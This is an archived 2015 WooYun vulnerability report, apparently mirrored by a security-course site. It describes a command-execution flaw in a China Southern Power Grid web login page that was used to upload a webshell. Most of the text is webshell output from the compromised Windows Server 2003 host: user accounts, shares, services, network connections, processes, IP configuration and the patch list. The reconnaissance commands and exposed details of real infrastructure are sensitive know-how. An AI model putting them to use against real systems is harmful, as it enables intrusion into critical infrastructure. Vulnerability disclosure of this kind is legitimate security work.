破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

中国南方电网某系统getshell

编号152409
Urlhttp://www.wooyun.org/bug.php?action=view&id=152409
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题中国南方电网某系统getshell
漏洞类型系统/服务补丁不及时
厂商中国南方电网
白帽子朱元璋
提交日期2015-11-06 18:47:00
公开日期2015-11-09 17:21:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank15
厂商评级
厂商评rank0
漏洞简介
None
漏洞细节

地址http://n.gy-center.net:8080/login.action存在命令执行漏洞

0.png


直接上传木马到服务器

1.jpg


2.png

POC

[*] 磁盘列表 [ C:D:E:F:G:P: ]
D:\Tomcat7\webapps\gycenter\gycenter\> net user
\\ 的用户帐户
-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_X3650 IWAM_X3650 SQLDebugger
SUPPORT_388945a0
命令运行完毕,但发生一个或多个错误。
系统找不到指定的路径。
D:\Tomcat7\> net share
共享名 资源 注释
-------------------------------------------------------------------------------
F$ F:\ 默认共享
IPC$ 远程 IPC
ADMIN$ C:\WINDOWS 远程管理
D$ D:\ 默认共享
E$ E:\ 默认共享
C$ C:\ 默认共享
命令成功完成。
D:\Tomcat7\> net view
列表是空的。
D:\Tomcat7\> net start
已经启动以下 Windows 服务:
Apache Tomcat 7.0 Tomcat7
Application Experience Lookup Service
Automatic Updates
COM+ Event System
COM+ System Application
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
HID Input Service
HTTP SSL
IIS Admin Service
IPSEC Services
Logical Disk Manager
Microsoft Search
MSSQLSERVER
MySQL5
Network Connections
Network Location Awareness (NLA)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Auto Connection Manager
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Procedure Call (RPC) Locator
Remote Registry
Secondary Logon
Security Accounts Manager
Serv-U FTP 服务器
Server
Shell Hardware Detection
SQLSERVERAGENT
Symantec pcAnywhere Host Service
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Terminal Services
VisualSVN Server
Windows Audio
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
World Wide Web Publishing Service
命令成功完成。
D:\Tomcat7\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 712
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 2704
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1029 0.0.0.0:0 LISTENING 468
TCP 0.0.0.0:1328 0.0.0.0:0 LISTENING 195828
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 195828
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1668
TCP 0.0.0.0:5631 0.0.0.0:0 LISTENING 1112
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 53464
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 53464
TCP 61.145.119.248:80 14.215.53.61:18751 TIME_WAIT 0
TCP 61.145.119.248:80 14.215.53.61:28815 TIME_WAIT 0
TCP 61.145.119.248:80 14.215.53.61:31659 TIME_WAIT 0
TCP 61.145.119.248:80 61.142.246.10:52687 ESTABLISHED 4
TCP 61.145.119.248:80 61.142.246.10:56848 ESTABLISHED 4
TCP 61.145.119.248:80 61.142.246.10:58138 ESTABLISHED 4
TCP 61.145.119.248:80 61.142.246.10:64213 ESTABLISHED 4
TCP 61.145.119.248:80 101.226.33.224:40631 TIME_WAIT 0
TCP 61.145.119.248:80 220.181.108.140:30043 TIME_WAIT 0
TCP 61.145.119.248:135 107.160.16.164:2887 ESTABLISHED 712
TCP 61.145.119.248:135 107.160.16.170:4953 ESTABLISHED 712
TCP 61.145.119.248:135 107.160.90.238:1329 ESTABLISHED 712
TCP 61.145.119.248:135 107.160.90.238:4810 ESTABLISHED 712
TCP 61.145.119.248:1433 61.145.119.84:1030 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1031 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1032 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1052 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1055 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1056 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1057 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1060 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1062 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:1063 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:4612 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:4817 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:4823 ESTABLISHED 195828
TCP 61.145.119.248:1433 61.145.119.84:4843 ESTABLISHED 195828
TCP 61.145.119.248:1433 104.149.23.12:5060 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5114 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5512 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5527 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5741 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:5903 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:6249 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:6706 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:6872 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7190 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7380 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7628 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7809 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:7891 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:8169 FIN_WAIT_1 195828
TCP 61.145.119.248:1433 104.149.23.12:8280 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:8342 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:9028 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:9785 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:9962 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:10520 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:10860 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:11041 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:11335 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:11527 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:11769 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:12554 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:12597 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:12644 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:13134 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:13671 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:14376 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:15098 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:16028 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:16726 FIN_WAIT_1 195828
TCP 61.145.119.248:1433 104.149.23.12:16956 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:17102 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:17185 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:18505 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:18594 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:18769 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:19349 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:19823 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:20325 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:20651 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:20990 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:21824 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:21866 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:22082 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:22272 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:22564 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:22663 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:23513 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24043 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24465 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24523 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24640 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:24942 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:26223 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:26482 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:26784 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:26979 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:27885 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:28571 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:29285 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:29401 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:29773 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:30110 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:30741 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:30800 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:31254 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:31667 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32010 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32104 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32271 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32561 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32564 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:32703 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33013 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33336 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33428 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33523 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33916 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:33968 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34058 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34221 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34409 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34531 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:34779 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35204 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35219 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35328 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35470 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35625 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:35985 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:36175 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:36473 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:36577 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:37243 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:37317 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:37765 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:37803 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:38306 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:38421 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:39237 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:39255 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:39959 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40253 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40401 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40862 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40879 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:40931 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:41572 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:41691 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:43053 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:43551 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:43643 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:43992 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44168 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44261 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44573 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44683 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:44926 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:45212 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:45373 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:45611 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:46077 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:46575 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:46909 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47015 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47427 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47439 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47556 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:47911 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48053 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48299 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48313 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48393 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48750 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:48859 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:49209 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:49296 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:49824 TIME_WAIT 0
TCP 61.145.119.248:1433 104.149.23.12:49911 TIME_WAIT 0
TCP 61.145.119.248:2121 0.0.0.0:0 LISTENING 2244
TCP 61.145.119.248:4515 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4516 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4518 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4519 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4520 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4521 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4522 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4523 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4524 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4525 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4526 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4527 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4528 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4529 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4530 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4532 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4533 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4535 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4536 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4537 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4538 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4539 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4540 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4541 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4542 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4543 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4544 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4545 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4546 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4547 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4548 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4549 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4550 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4551 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4552 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4553 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4554 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4555 61.145.119.248:1433 TIME_WAIT 0
TCP 61.145.119.248:4556 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4557 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4558 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4559 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4560 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4561 61.145.119.102:1433 TIME_WAIT 0
TCP 61.145.119.248:4562 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4563 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4564 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4565 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4566 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4567 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4568 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4569 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4570 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4571 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4572 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4573 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4574 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4575 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4576 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4577 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4578 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4579 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4580 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:4581 61.145.119.102:1433 ESTABLISHED 53464
TCP 61.145.119.248:8080 171.111.42.252:37132 TIME_WAIT 0
TCP 61.145.119.248:8080 171.111.42.252:37351 ESTABLISHED 53464
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING 53464
TCP 127.0.0.1:43958 0.0.0.0:0 LISTENING 2244
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 468
UDP 0.0.0.0:1434 *:* 195828
UDP 0.0.0.0:4500 *:* 468
UDP 0.0.0.0:5632 *:* 1112
UDP 61.145.119.248:123 *:* 812
UDP 127.0.0.1:123 *:* 812
D:\Tomcat7\> tasklist /svc
映像名称 PID 服务
========================= ======== ============================================
System Idle Process 0 暂缺
System 4 暂缺
smss.exe 336 暂缺
csrss.exe 384 暂缺
winlogon.exe 408 暂缺
services.exe 456 Eventlog, PlugPlay
lsass.exe 468 HTTPFilter, NtLmSsp, PolicyAgent,
ProtectedStorage, SamSs
svchost.exe 648 DcomLaunch
svchost.exe 712 RpcSs
svchost.exe 776 Dhcp, Dnscache
svchost.exe 812 LmHosts, W32Time
svchost.exe 828 AeLookupSvc, AudioSrv, Browser, CryptSvc,
dmserver, EventSystem, helpsvc, HidServ,
lanmanserver, lanmanworkstation, Netman,
Nla, RasAuto, RasMan, Schedule, seclogon,
SENS, ShellHWDetection, TrkWks, winmgmt,
wuauserv, WZCSVC
spoolsv.exe 940 Spooler
msdtc.exe 980 MSDTC
awhost32.exe 1112 awhost32
svchost.exe 1164 ERSvc
inetinfo.exe 1468 IISADMIN
mysqld.exe 1668 MySQL5
svchost.exe 1940 RemoteRegistry
locator.exe 1960 RpcLocator
ServUDaemon.exe 2244 Serv-U
svchost.exe 2324 TapiSrv
svchost.exe 2336 TermService
VisualSVNServer.exe 2704 VisualSVNServer
dllhost.exe 3664 COMSysApp
mssearch.exe 3692 MSSEARCH
svchost.exe 3796 W3SVC
VisualSVNServer.exe 4484 暂缺
wmiprvse.exe 5808 暂缺
explorer.exe 7560 暂缺
Tomcat6w.exe 7652 暂缺
ctfmon.exe 7660 暂缺
Tomcat7w.exe 7688 暂缺
sqlmangr.exe 7700 暂缺
Tomcat7.exe 53464 Tomcat7
FlashFXP.exe 199788 暂缺
mmc.exe 205120 暂缺
sqlservr.exe 195828 MSSQLSERVER
sqlagent.exe 168480 SQLSERVERAGENT
logon.scr 176200 暂缺
w3wp.exe 211280 暂缺
davcdata.exe 208824 暂缺
w3wp.exe 208760 暂缺
cmd.exe 177320 暂缺
tasklist.exe 146092 暂缺
wmiprvse.exe 206900 暂缺
D:\Tomcat7\> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : x3650
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter 本地连接 2:
Media State . . . . . . . . . . . : Media disconnected
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #22
Physical Address. . . . . . . . . : 34-40-B5-9D-5C-3E
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #34
Physical Address. . . . . . . . . : 34-40-B5-9D-5C-3C
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 61.145.119.248
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 61.145.119.1
DNS Servers . . . . . . . . . . . : 202.96.128.86
202.96.128.110
NetBIOS over Tcpip. . . . . . . . : Disabled
D:\Tomcat7\> systeminfo
主机名: X3650
OS 名称: Microsoft(R) Windows(R) Server 2003, Enterprise Edition
OS 版本: 5.2.3790 Service Pack 2 Build 3790
OS 制造商: Microsoft Corporation
OS 配置: 独立服务器
OS 构件类型: Multiprocessor Free
注册的所有人: ibm
注册的组织:
产品 ID: 69813-650-6830353-45198
初始安装日期: 2012-7-13, 17:10:41
系统启动时间: 469 天 21 小时 10 分 20 秒
系统制造商: IBM
系统型号: System x3650 M3 -[7945O25]-
系统类型: X86-based PC
处理器: 安装了 16 个处理器。
[01]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[02]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[03]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[04]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[05]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[06]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[07]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[08]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[09]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[10]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[11]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[12]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[13]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[14]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[15]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
[16]: x86 Family 6 Model 44 Stepping 2 GenuineIntel ~2400 Mhz
BIOS 版本: IBM - 0
Windows 目录: C:\WINDOWS
系统目录: C:\WINDOWS\system32
启动设备: \Device\HarddiskVolume1
系统区域设置: zh-cn;中文(中国)
输入法区域设置: 暂缺
时区: (GMT+08:00) 北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量: 16,372 MB
可用的物理内存: 13,268 MB
页面文件: 最大值: 18,157 MB
页面文件: 可用: 14,953 MB
页面文件: 使用中: 3,204 MB
页面文件位置: C:\pagefile.sys
域: WORKGROUP
登录服务器: 暂缺
修补程序: 安装了 240 个修补程序。
[01]: File 1
[02]: File 1
[03]: File 1
[04]: File 1
[05]: File 1
[06]: File 1
[07]: File 1
[08]: File 1
[09]: File 1
[10]: File 1
[11]: File 1
[12]: File 1
[13]: File 1
[14]: File 1
[15]: File 1
[16]: File 1
[17]: File 1
[18]: File 1
[19]: File 1
[20]: File 1
[21]: File 1
[22]: File 1
[23]: File 1
[24]: File 1
[25]: File 1
[26]: File 1
[27]: File 1
[28]: File 1
[29]: File 1
[30]: File 1
[31]: File 1
[32]: File 1
[33]: File 1
[34]: File 1
[35]: File 1
[36]: File 1
[37]: File 1
[38]: File 1
[39]: File 1
[40]: File 1
[41]: File 1
[42]: File 1
[43]: File 1
[44]: File 1
[45]: File 1
[46]: File 1
[47]: File 1
[48]: File 1
[49]: File 1
[50]: File 1
[51]: File 1
[52]: File 1
[53]: File 1
[54]: File 1
[55]: File 1
[56]: File 1
[57]: File 1
[58]: File 1
[59]: File 1
[60]: File 1
[61]: File 1
[62]: File 1
[63]: File 1
[64]: File 1
[65]: File 1
[66]: File 1
[67]: File 1
[68]: File 1
[69]: File 1
[70]: File 1
[71]: File 1
[72]: File 1
[73]: File 1
[74]: File 1
[75]: File 1
[76]: File 1
[77]: File 1
[78]: File 1
[79]: File 1
[80]: File 1
[81]: File 1
[82]: File 1
[83]: File 1
[84]: File 1
[85]: File 1
[86]: File 1
[87]: File 1
[88]: File 1
[89]: File 1
[90]: File 1
[91]: File 1
[92]: File 1
[93]: File 1
[94]: File 1
[95]: File 1
[96]: File 1
[97]: File 1
[98]: File 1
[99]: File 1
[100]: File 1
[101]: File 1
[102]: File 1
[103]: File 1
[104]: File 1
[105]: File 1
[106]: File 1
[107]: File 1
[108]: File 1
[109]: File 1
[110]: File 1
[111]: File 1
[112]: File 1
[113]: File 1
[114]: File 1
[115]: File 1
[116]: File 1
[117]: File 1
[118]: Q147222
[119]: KB2742604 - QFE
[120]: KB2901115 - QFE
[121]: KB979907 - QFE
[122]: KB975558_WM8
[123]: KB925398_WMP64
[124]: KB2564958 - Update
[125]: KB2115168 - Update
[126]: KB2229593 - Update
[127]: KB2347290 - Update
[128]: KB2378111 - Update
[129]: KB2387149 - Update
[130]: KB2419635 - Update
[131]: KB2423089 - Update
[132]: KB2443105 - Update
[133]: KB2476490 - Update
[134]: KB2478960 - Update
[135]: KB2478971 - Update
[136]: KB2483185 - Update
[137]: KB2485663 - Update
[138]: KB2506212 - Update
[139]: KB2507938 - Update
[140]: KB2508429 - Update
[141]: KB2509553 - Update
[142]: KB2510587 - Update
[143]: KB2535512 - Update
[144]: KB2536276-v2 - Update
[145]: KB2544893-v2 - Update
[146]: KB2566454 - Update
[147]: KB2570947 - Update
[148]: KB2584146 - Update
[149]: KB2598479 - Update
[150]: KB2603381 - Update
[151]: KB2620712 - Update
[152]: KB2631813 - Update
[153]: KB2638806 - Update
[154]: KB2653956 - Update
[155]: KB2655992 - Update
[156]: KB2659262 - Update
[157]: KB2676562 - Update
[158]: KB2685939 - Update
[159]: KB2691442 - Update
[160]: KB2698365 - Update
[161]: KB2705219-v2 - Update
